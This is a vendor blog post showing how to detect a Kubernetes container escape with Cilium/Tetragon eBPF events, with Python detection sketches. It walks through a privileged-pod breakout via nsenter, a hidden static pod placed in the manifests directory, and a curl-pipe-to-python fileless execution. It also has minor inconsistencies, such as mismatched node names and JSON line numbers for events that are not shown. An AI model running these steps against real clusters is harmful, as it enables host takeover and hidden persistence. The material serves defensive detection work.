Detecting a Container Escape with Tetragon and eBPF

News: Tetragon has reached 1.0!

Tetragon (referred to as Cilium in this article) has hit the 1.0 OSS milestone!

If you run Cloud Native Workloads, you had better secure them. After all, services are often exposed to the public and workloads might belong to various tenants. In this blog post we will show you how an attacker with access to your Kubernetes cluster could perform a container escape: running a pod to gain root privileges, escaping the pod onto the host, and persisting the attack with invisible pods and fileless executions. We will also show you how to detect these attacks with Isovalent Cilium Enterprise.

The Problem

During a container escape, an attacker breaks the isolation boundary between the container and the host and lands on what is ultimately a Kubernetes control plane or worker node. From there, the attacker can see other containers running on the same host, gather their secrets, read or write data on the host file system, attack kubelet and escalate privileges, or exploit a Kubernetes bug and persist in the environment by deploying an invisible pod.

Applying security best practices in a Kubernetes environment can limit these types of attacks, but a container breakout is still possible: an attacker can use a privileged pod or exploit an existing vulnerability to gain privileges. Security Teams need to measure whether hardening configurations are suitable and whether the applied protections are working.

Solution

One way to achieve this is observability following a data-driven approach: collect data from Kubernetes workloads and hosts, observe feedback, and make continuous data-driven decisions to protect the Kubernetes environment.

By using eBPF, Security Teams can get unique visibility directly into any Kubernetes workload, such as a pod. Because pods on a Kubernetes node share a single kernel, each process within a pod is visible to a single eBPF program. This can provide full visibility into every process running on a node, whether it is a long-running process on the host managed by systemd or a short-lived process running inside a container.

Cilium

Cilium uses eBPF to very efficiently monitor all network and process behaviour inside of Kubernetes workloads and outside on the host and gives you Kubernetes Identity Aware and OS Level Process Visibility into those behaviours.

Cilium deploys as a daemonset inside of a Kubernetes environment. So, there is a Cilium agent running on each Kubernetes node and it is communicating with the Kubernetes API server to understand Kubernetes Pod Identities, Network Policies, Services etc. Then based on the identity of each one of the workloads deployed inside of a Kubernetes environment, Cilium installs a highly efficient eBPF program to do Connectivity, Observability and Security for those workloads.

Rich Security Events

Cilium can both observe and enforce behaviour inside a Linux system. It can collect and filter Security Observability data directly in the kernel and export it to user space as JSON events and/or store it in a specific log file via a Daemonset called hubble-enterprise. These JSON events are enriched with Kubernetes Identity Aware Information, including services, labels, namespaces, pods and containers, and with OS Level Process Visibility data, including process binaries, pids, uids and parent binaries with the full Process Ancestry Tree. These events can then be exported in a variety of formats and sent to external systems such as a SIEM (e.g. Elasticsearch or Splunk) or stored in an S3 bucket. For simplicity, in this blog post they will be consumed directly from the log file.
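
To make the log-file route concrete, here is a minimal Python sketch that reads newline-delimited JSON events and pulls out the fields described above. The field layout (process_exec, process, parent, pod) is an assumption based on the descriptions in this post, and the sample event is illustrative: it is assembled from values quoted later in the walkthrough, not captured output.

```python
import json


def iter_events(lines, event_type="process_exec"):
    """Yield the payload of every JSON line that carries the given event type."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip anything in the log that is not JSON
        if isinstance(event, dict) and event_type in event:
            yield event[event_type]


def summarize(payload):
    """Flatten the identity and process fields an analyst usually checks first."""
    process = payload.get("process") or {}
    pod = process.get("pod") or {}
    parent = payload.get("parent") or {}
    return {
        "namespace": pod.get("namespace"),
        "pod": pod.get("name"),
        "binary": process.get("binary"),
        "arguments": process.get("arguments"),
        "pid": process.get("pid"),
        "uid": process.get("uid"),
        "parent_binary": parent.get("binary"),
    }


# Illustrative event only; the schema is assumed, not taken from real output.
SAMPLE_LOG = [
    json.dumps({
        "process_exec": {
            "process": {
                "binary": "/docker-entrypoint.sh",
                "arguments": 'nginx -g "daemon off;"',
                "pid": 23715,
                "uid": 0,
                "pod": {"namespace": "default", "name": "privileged-the-pod"},
            },
            "parent": {"binary": "/usr/bin/containerd-shim"},
        }
    }),
    "this line is not JSON and is skipped",
]

for payload in iter_events(SAMPLE_LOG):
    print(summarize(payload))
```

In practice the lines would come from the export log (for example by piping the kubectl logs output into the script) instead of the hard-coded sample list.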

By leveraging this real-time Network and Process-Level Visibility Data from the kernel via Cilium, Security Teams are able to see all the processes that have been executed in their Kubernetes environment, which helps them make continuous data-driven decisions and improve the security posture of their system. One such example is detecting a container escape.

Let’s reach the host namespace

In this example, we are using a privileged pod with host namespace configuration to represent a container escape attack. As we demonstrate here, this is possible even in a hardened Kubernetes environment. Note that there are multiple ways to perform a breakout; for example, an attacker can also exploit a vulnerability to gain privileges and escape from the container sandbox.

The problem: attackers can launch privileged pods to access host resources

The first and easiest step for an attacker to perform a container escape would be to spin up a pod with a privileged Pod spec. Note: Kubernetes allows this by default, and the privileged flag grants the container all available kernel capabilities. The hostPID and hostNetwork flags place the container into the host PID and networking namespaces, so it can see and interact with all process and network resources. One easy example can be found in the following yaml file:

$ cat privileged.yaml

apiVersion: v1
kind: Pod
metadata:
  name: privileged-the-pod
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: privileged-the-pod
    image: nginx:latest
    ports:
    - containerPort: 80
    securityContext:
      privileged: true
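
Before moving on, it can help to see how such a spec could be flagged before it is ever applied. The following Python sketch is only an illustration: the function name risky_settings is hypothetical, and the manifest is represented as a plain dict (as it would look after being parsed by any YAML library) so the example has no dependencies.

```python
def risky_settings(pod):
    """Return the host-access settings requested by a Pod manifest given as a dict."""
    spec = pod.get("spec") or {}
    findings = []
    # Pod-level flags that place the pod into host namespaces.
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag) is True:
            findings.append(flag)
    # Container-level privileged flag.
    for container in spec.get("containers") or []:
        context = container.get("securityContext") or {}
        if context.get("privileged") is True:
            findings.append("privileged container: " + str(container.get("name")))
    return findings


# The same manifest as privileged.yaml, written as a Python dict.
PRIVILEGED_POD = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "privileged-the-pod"},
    "spec": {
        "hostPID": True,
        "hostNetwork": True,
        "containers": [
            {
                "name": "privileged-the-pod",
                "image": "nginx:latest",
                "ports": [{"containerPort": 80}],
                "securityContext": {"privileged": True},
            }
        ],
    },
}

print(risky_settings(PRIVILEGED_POD))
# prints ['hostPID', 'hostNetwork', 'privileged container: privileged-the-pod']
```

A check like this belongs in admission control or CI; it complements runtime detection but does not replace it.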

So, let’s apply that privileged Pod spec:

$ kubectl apply -f privileged.yaml
pod/privileged-the-pod created

$ kubectl get pods
NAME                 READY   STATUS    RESTARTS   AGE
privileged-the-pod   1/1     Running   0          11s

Now, the attacker has a privileged pod up and running, which gives them the same permissions as they would have if they were root on the underlying node. Why is it so powerful? Because of the capabilities that the pod has started with, including CAP_SYS_ADMIN, which is essentially the “new root” in Linux and also gives access to all devices on the host machine. This capability in combination with hostPID lets the attacker break out of all the container namespaces put in place, so they can interact with and exploit any other process or filesystem on the underlying node where the privileged pod is deployed.

By using Cilium, Security Teams can detect any privileged container execution by picking up the following process_exec event exported to userspace by executing the following command:

kubectl logs -n kube-system ds/hubble-enterprise -c export-stdout

In that event, they can see the related:

Kubernetes Identity Aware Information, such as the namespace: default, the pod name: privileged-the-pod, the container-id and the label
OS Level Visibility Information, such as the binary: /docker-entrypoint.sh, pid: 23715, uid: 0 and the arguments: nginx -g "daemon off;"
Full Process Ancestry Tree which includes /usr/bin/containerd-shim as a direct parent process binary
Capabilities that the container has started which includes CAP_NET_RAW and CAP_SYS_ADMIN
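
As a rough illustration of how the capability information could be used, the sketch below checks a process record for a small watch list of capabilities. The cap field with permitted, effective and inheritable lists is an assumed layout, and the watch list simply contains the two capabilities named above; both are placeholders to adapt to your own events.

```python
# Hypothetical watch list: the two capabilities called out in this post.
WATCHED_CAPS = {"CAP_SYS_ADMIN", "CAP_NET_RAW"}


def watched_caps(process):
    """Return the watched capabilities present in any capability set of a process record."""
    caps = process.get("cap") or {}
    granted = set()
    for set_name in ("permitted", "effective", "inheritable"):
        granted.update(caps.get(set_name) or [])
    return sorted(granted & WATCHED_CAPS)


# Illustrative record; the field names are assumptions.
example = {
    "binary": "/docker-entrypoint.sh",
    "cap": {"permitted": ["CAP_CHOWN", "CAP_NET_RAW", "CAP_SYS_ADMIN"]},
}

print(watched_caps(example))  # prints ['CAP_NET_RAW', 'CAP_SYS_ADMIN']
```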

As a second step, the attacker can use kubectl exec to get shell access to privileged-the-pod:

kubectl exec -it privileged-the-pod -- /bin/bash
root@minikube:/#

A shell suddenly popping up in a container after it was started is of course an event the Security Team is interested in. They can detect the bash execution by picking up the following process_exec event exported to userspace via Cilium. The Process Information can be seen between lines 4 and 11, while the Kubernetes Identity Aware Information can be seen between lines 12 and 24.
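
A simple rule for this case could look like the following Python sketch. It assumes the same event layout as before (a process record with binary and pod fields, which is our assumption) and a hypothetical list of shell names; it flags any exec of a shell that is attributed to a pod.

```python
import posixpath

# Hypothetical list of interpreter names to treat as interactive shells.
SHELL_NAMES = {"sh", "bash", "dash", "ash", "zsh"}


def is_shell_in_pod(payload):
    """Return True when a process_exec payload shows a shell started inside a pod."""
    process = payload.get("process") or {}
    pod = process.get("pod") or {}
    name = posixpath.basename(process.get("binary") or "")
    return bool(pod.get("name")) and name in SHELL_NAMES


# Illustrative payloads; the field names are assumptions.
shell_exec = {"process": {"binary": "/bin/bash", "pod": {"name": "privileged-the-pod"}}}
entrypoint = {"process": {"binary": "/docker-entrypoint.sh", "pod": {"name": "privileged-the-pod"}}}

print(is_shell_in_pod(shell_exec), is_shell_in_pod(entrypoint))  # prints True False
```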

As a third step, the attacker can use the nsenter command to enter into the host namespace and run the bash command as root on the host.

root@minikube:/# nsenter -t 1 -a bash
bash-5.0#

The nsenter command executes commands in specified namespaces. The first flag, -t, specifies the target process whose namespaces the attacker wants to enter. Every Linux machine runs a process with PID 1, which always runs in the host namespaces. The remaining command line arguments select which of the target's namespaces to enter; in this case, -a selects all of them.

So, the attacker is breaking out from the container in every possible way and running the bash command as root on the host.
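
The argument pattern described above can be checked mechanically. This Python sketch parses an nsenter argument string and reports whether it targets PID 1 and whether it asks for all namespaces. The function name and the returned keys are hypothetical, and the parsing is deliberately simple: it does not distinguish nsenter's own flags from flags of the command being run.

```python
import posixpath
import shlex


def inspect_nsenter(binary, arguments):
    """Describe an nsenter invocation, or return None for any other binary."""
    if posixpath.basename(binary) != "nsenter":
        return None
    tokens = shlex.split(arguments or "")
    target = None
    for index, token in enumerate(tokens):
        if token in ("-t", "--target") and index + 1 < len(tokens):
            target = tokens[index + 1]          # "-t 1" or "--target 1"
        elif token.startswith("--target="):
            target = token.split("=", 1)[1]     # "--target=1"
        elif token.startswith("-t") and len(token) > 2:
            target = token[2:]                  # "-t1"
    return {
        "host_target": target == "1",
        "all_namespaces": any(token in ("-a", "--all") for token in tokens),
    }


print(inspect_nsenter("/usr/bin/nsenter", "-t 1 -a bash"))
# prints {'host_target': True, 'all_namespaces': True}
```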

Security Teams can identify this breakout by picking up two process_exec events. In the first event, they are able to observe the executed nsenter command in line 8 with the appropriate namespace arguments -t 1 -a in line 9. They can also see the source pod name in line 15, which is privileged-the-pod and all the Kubernetes Identity Aware and OS Level Visibility Information:

By picking up the second process_exec event, Security Teams are able to detect the bash execution in the host namespace with nsenter as its parent process binary. The Parent Process Information can be seen between lines 151 and 177, and the source binary name can be seen in line 8, which is /usr/bin/bash:

Now, the attacker has reached the host namespace on a node in a Kubernetes cluster and is running bash. We have used a privileged container with hostPID associations in this example. In the real world, this could also have been an unprivileged container with its own process namespace that then managed to exploit a kernel vulnerability to gain privileges and break out. What can they do? The attacker can see containers that are running on the same controller node, gather secrets associated with them, read data from the host file system, attack kubelet and escalate privileges; or exploit a special Kubernetes behavior and persist the breakout by firing up an invisible container. Let’s assume the attacker chooses the last option.

Container where are you?

Persist the breakout by creating a container that is invisible to the Kubernetes API server

Apart from stealing sensitive information from other Kubernetes workloads and peeking into other Kubernetes namespaces, the attacker can persist the breakout by starting a “hidden”, static pod.

There are many ways an attacker could create a persistent process to hide traces of further activities. For this example, we are going to use a static Kubernetes pod. Unfortunately, many Security Teams make the assumption that every time kubelet launches a workload all the configs have been statically analyzed by the Kubernetes API server and its webhooks. They don’t take into account that if an attacker inserts a Pod spec under the /etc/kubernetes/manifests directory on a kubeadm managed cluster, kubelet will automatically launch the pod without notifying the Kubernetes API server about it.

How a container can be hidden from the K8s API

To persist the breakout, the attacker, who now has access to all the resources, can go to the /etc/kubernetes/manifests directory on the controller node and take a look at what is there:

bash-5.0# cd /etc/kubernetes/manifests/
bash-5.0# ls -l
total 20
-rw------- 1 root root 2289 Oct 13 12:40 etcd.yaml
-rw------- 1 root root 3595 Oct 13 12:40 kube-apiserver.yaml
-rw------- 1 root root 2895 Oct 13 12:40 kube-controller-manager.yaml
-rw------- 1 root root 1385 Oct 13 12:40 kube-scheduler.yaml

As a next step, the attacker can insert a Pod spec named hack-latest.yaml with a namespace that doesn’t exist (namespace: doesnt-exist). This way the pod will be picked up by kubelet by default and will still be invisible to the Kubernetes API server.

bash-5.0# cat << EOF > hack-latest.yaml
> apiVersion: v1
> kind: Pod
> metadata:
>   name: hack-latest
>   # define a namespace that doesn't exist so
>   # the workload is invisible to the API server
>   namespace: doesnt-exist
> spec:
>   # share the host network namespace
>   hostNetwork: true
>   containers:
>   - name: hack-latest
>     image: sublimino/hack:latest
>     command: ["/bin/sh"]
>     args: ["-c", "while true; do sleep 10;done"]
>     securityContext:
>       privileged: true
>   # Define the control plane node the privileged pod
>   # will be scheduled to
>   nodeName: kind-control-plane
> EOF
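
One hedged way to audit for this trick is to compare the namespace declared in each static pod manifest with the namespaces the API server actually knows about. The sketch below assumes the manifest has already been parsed into a dict and that the set of known namespaces was collected separately; the function name is hypothetical.

```python
def undeclared_namespace(manifest, known_namespaces):
    """Return the manifest's namespace if the API server does not know it, else None."""
    metadata = manifest.get("metadata") or {}
    namespace = metadata.get("namespace") or "default"
    return None if namespace in known_namespaces else namespace


# Namespaces visible in this walkthrough's cluster.
KNOWN_NAMESPACES = {"default", "kube-system"}

# Relevant part of hack-latest.yaml, written as a Python dict.
HACK_MANIFEST = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "hack-latest", "namespace": "doesnt-exist"},
}

print(undeclared_namespace(HACK_MANIFEST, KNOWN_NAMESPACES))  # prints doesnt-exist
```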

As a validation, the attacker can firstly run crictl ps and see that the container is running on the controller node. The following bash snippet shows that the hack-latest container is up and running with the following docker id cc7f47efbbfee:

bash-5.0# crictl ps
CONTAINER        IMAGE                                                                                      CREATED              STATE      NAME                      ATTEMPT             POD ID
cc7f47efbbfee    sublimino/hack@sha256:569f3fd3a626a4cfd50e4556425216a5b8ab3d8bf9476c1b1c615b83ffe4000a     About a minute ago   Running    hack-latest               0                   895972101d32b
e083d7868b7ff    cilium/json-mock@sha256:d8797011275f12c0a22d308227364493954c9e07e21c96c7caf6cf50b892d638   19 minutes ago       Running    frontend-service          0                   31260e2cd0dc8
a025e4319f354    cilium/json-mock@sha256:d8797011275f12c0a22d308227364493954c9e07e21c96c7caf6cf50b892d638   19 minutes ago       Running    backend-service           0                   a455f019f215b
...

Secondly, the attacker can run kubectl get pods --all-namespaces from outside the controller node, which shows that the hack-latest container is completely invisible to the Kubernetes API server in the following bash snippet:

$ kubectl get pods --all-namespaces
NAMESPACE     NAME                               READY   STATUS    RESTARTS   AGE
default       privileged-the-pod                 1/1     Running   0          51m
kube-system   cilium-n8wtg                       1/1     Running   0          75m
kube-system   cilium-operator-65fcccb665-7vwjh   0/1     Pending   0          75m
kube-system   cilium-operator-65fcccb665-bbfph   1/1     Running   0          75m
kube-system   coredns-558bd4d5db-hvvph           1/1     Running   0          75m
kube-system   etcd-minikube                      1/1     Running   0          76m
kube-system   hubble-enterprise-jrl56            2/2     Running   0          55m
kube-system   hubble-relay-8676fb6fdc-r4285      1/1     Running   0          75m
kube-system   hubble-ui-7f6d94945b-mtffv         3/3     Running   0          75m
kube-system   kube-apiserver-minikube            1/1     Running   0          76m
kube-system   kube-controller-manager-minikube   1/1     Running   0          76m
kube-system   kube-proxy-m958t                   1/1     Running   0          76m
kube-system   kube-scheduler-minikube            1/1     Running   0          76m
kube-system   storage-provisioner                1/1     Running   1          76m

With Cilium, Security Teams can follow the attacker’s moves up to the creation of the invisible container by picking up the following exported process_exec events.

The first event shows the hack-latest.yaml Pod spec insertion under the /etc/kubernetes/manifests/ directory. The source binary can be seen in line 8 while the current working directory is shown in line 7.
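
A rule for this first event might be sketched as follows: flag any process whose working directory is the static pod manifest directory, or whose arguments mention it. The cwd and arguments field names are assumptions about the event layout.

```python
import posixpath

MANIFEST_DIR = "/etc/kubernetes/manifests"


def touches_manifest_dir(process):
    """Return True when a process runs in, or refers to, the static pod manifest directory."""
    cwd = posixpath.normpath(process.get("cwd") or "/")
    if cwd == MANIFEST_DIR or cwd.startswith(MANIFEST_DIR + "/"):
        return True
    return MANIFEST_DIR in (process.get("arguments") or "")


# Illustrative record; the field names are assumptions.
insertion = {"binary": "/usr/bin/cat", "cwd": "/etc/kubernetes/manifests/"}
print(touches_manifest_dir(insertion))  # prints True
```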

By detecting the second process_exec event, Security Teams are able to pick up the invisible hack-latest container execution having the source binary in line 8 and the arguments in line 9.

Execute a malicious python script in memory

Now that the attacker has persisted the breakout by spinning up an invisible container, they can download and execute a malicious script in memory that never touches disk. Note that this simple python script stands in for fileless malware, which is almost impossible to detect with traditional userspace tools.

As a first step, the attacker can docker exec into the invisible container hack-latest:

bash-5.0# docker exec -it cc7f47efbbfee /bin/bash
PRETTY_NAME="Alpine Linux v3.12"
root@minikube:~

Then they download a malicious python script and execute it in memory:

root@minikube:~ [1]# curl https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py | python
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   488  100   488    0     0   1574      0 --:--:-- --:--:-- --:--:--  1574
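
Because the script arrives on standard input, the interpreter starts without a script path, and that in itself is a usable signal. The following Python sketch flags python invocations that have no script argument (or the explicit - argument). It is a heuristic under simplifying assumptions: it treats -c and -m as "not stdin" and does not model interpreter options that take a value.

```python
import posixpath
import shlex


def runs_from_stdin(binary, arguments):
    """Return True when a python interpreter appears to read its program from stdin."""
    if not posixpath.basename(binary).startswith("python"):
        return False
    tokens = shlex.split(arguments or "")
    if "-c" in tokens or "-m" in tokens:
        return False  # program comes from a command string or a module
    positional = [t for t in tokens if t == "-" or not t.startswith("-")]
    return not positional or positional[0] == "-"


print(runs_from_stdin("/usr/bin/python", ""))              # prints True
print(runs_from_stdin("/usr/bin/python", "18_zipper.py"))  # prints False
```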

With Cilium, Security Teams are able to follow the attacker’s movement by using the power of the kernel: they gain real-time visibility into process executions and network connections, and can observe system access.

They can pick up the following process_exec events. With the first event, they are able to see the bash execution in a container with a docker id of cc7f47efbbfee, which is the invisible hack-latest container. The docker id can be seen in line 12, meanwhile the source binary can be seen in line 8.

In the second process_exec event Security Teams are able to observe the sensitive curl command in line 8 with the following arguments https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py in line 9:

With the third event, a process_connect event, Security Teams are also able to pick up the sensitive socket connection opened via curl with the following arguments https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py and with the following destination IP 185.199.110.133 and port 443. The Source and Destination Address Information can be found between lines 29 and 32, while the Process Information can be found between lines 4 and 14.
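
To illustrate how such a connection event could be triaged, the sketch below reports destinations outside private address space. The destination_ip and destination_port field names are assumptions about the process_connect payload, and the function name is hypothetical.

```python
import ipaddress


def external_destination(payload):
    """Return 'ip:port' when the destination is a globally routable address, else None."""
    ip = ipaddress.ip_address(payload["destination_ip"])
    if not ip.is_global:
        return None  # private, loopback, link-local and similar ranges
    return "{}:{}".format(ip, payload.get("destination_port"))


# Destination quoted in this post; the field names are assumptions.
curl_connect = {"destination_ip": "185.199.110.133", "destination_port": 443}
print(external_destination(curl_connect))  # prints 185.199.110.133:443
```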

Lastly, with the fourth process_exec event, Security Teams are able to pick up the malicious python script execution in memory. The cc7f47efbbfee2ff38382d32 docker id of the container can be seen in line 12 while the /usr/bin/python source binary can be seen in line 8:

Conclusion

Securing a Kubernetes environment can be challenging. Measuring the current state of the security posture in your Kubernetes environment requires Observability. Security Teams need to start collecting the right data to be able to detect a sophisticated attack, like a container escape that occurs within a Kubernetes environment.

The container escape attack that was covered in this blog post included simple but effective steps proving that Security Teams need Observability and the ability to Measure the data to be able to detect those steps.

By leveraging the Observability of Isovalent Cilium Enterprise, they can detect behaviours that are outside of the security posture of their environment.

This becomes possible by the superpower of eBPF and Cilium.

Next steps

If you want to learn more about Isovalent Cilium Enterprise, the open source project Cilium or the underlying technology eBPF, join us for an “Ask Me Anything” with one of our technical experts.

About Isovalent

Isovalent is the company founded by the creators of Cilium and eBPF. Isovalent builds open-source software and enterprise solutions solving networking, security, and observability needs for modern cloud native infrastructure. The flagship technology Cilium is the choice of leading global organizations including Adobe, AWS, Capital One, Datadog, GitLab, Google, and many more. Isovalent is headquartered in Mountain View, CA and is backed by Andreessen Horowitz, Google and Cisco Investments. To learn more, visit isovalent.com or follow @isovalent.